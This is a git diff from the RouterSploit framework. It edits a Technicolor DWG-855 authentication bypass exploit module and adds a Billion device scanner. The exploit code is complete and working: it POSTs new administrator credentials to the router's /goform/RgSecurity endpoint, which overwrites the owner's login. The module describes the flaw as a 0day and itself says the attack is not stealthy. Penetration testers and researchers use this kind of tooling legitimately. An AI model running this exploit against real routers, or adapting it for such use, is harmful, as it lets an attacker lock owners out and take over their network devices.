Merge remote-tracking branch 'remotes/upstream/master' into credentials

routersploit/modules/exploits/technicolor/dwg855_authbypass.py

@@ -16,11 +16,11 @@ class Exploit(exploits.Exploit):
     If the target is vulnerable, it allows us to overwrite arbitrary configuration parameters.
     """
     __info__ = {
-        'name': 'Technicolor DWG-855 Authentication Bypass vulnerability.',
-        'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.',
+        'name': 'Technicolor DWG-855 Auth Bypass',
+        'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous credentials, this is NOT stealthy.',
         'authors': [
-            'JPaulMora <https://JPaulMora.GitHub.io>',
-            # vulnerability discovery,routersploit module
+            'JPaulMora <https://JPaulMora.GitHub.io>',  # vulnerability discovery, routersploit module
+            '0BuRner',  # routersploit module
         ],
         'references': [
             'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
@@ -39,21 +39,23 @@ class Exploit(exploits.Exploit):
     vulnresp = "\x11\x44\x75\x63\x6b\x79\x00"  # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
 
     def run(self):
-        print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass)
-        url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
-        headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
-        data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"}
+        if self.check():
+            print_success("Target is vulnerable")
+            print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass)
+            url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
+            headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
+            data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"}
 
-        response = http_request(method="POST", url=url, headers=headers, data=data)
+            response = http_request(method="POST", url=url, headers=headers, data=data)
 
-        if response is None:
-            print_error("Target didn't answer request.")
-        elif self.vulnresp in response.text.encode('utf-8'):
-            print_success("Credentials changed!")
-        elif response.status_code == 401:
-            print_error("Target answered, denied access.")
+            if response is None:
+                print_error("Target did not answer request")
+            elif response.status_code == 401:
+                print_error("Target answered, denied access.")
+            else:
+                print_success("Credentials changed")
         else:
-            print_error("Unknown error, submit an issue.")
+            print_error("Exploit failed - Target seems to be not vulnerable")
 
     @mute
     def check(self):

routersploit/modules/scanners/billion_scan.py

+from __future__ import absolute_import
+
+from .autopwn import Exploit as BaseScanner
+
+
+class Exploit(BaseScanner):
+    """
+    Scanner implementation for Billion vulnerabilities.
+    """
+    __info__ = {
+        'name': 'Billion Scanner',
+        'description': 'Scanner module for Billion devices',
+        'authors': [
+            'Mariusz Kupidura <f4wkes[at]gmail.com>',  # routersploit module
+        ],
+        'references': (
+            '',
+        ),
+        'devices': (
+            'Billion',
+        ),
+    }
+    vendor = 'billion'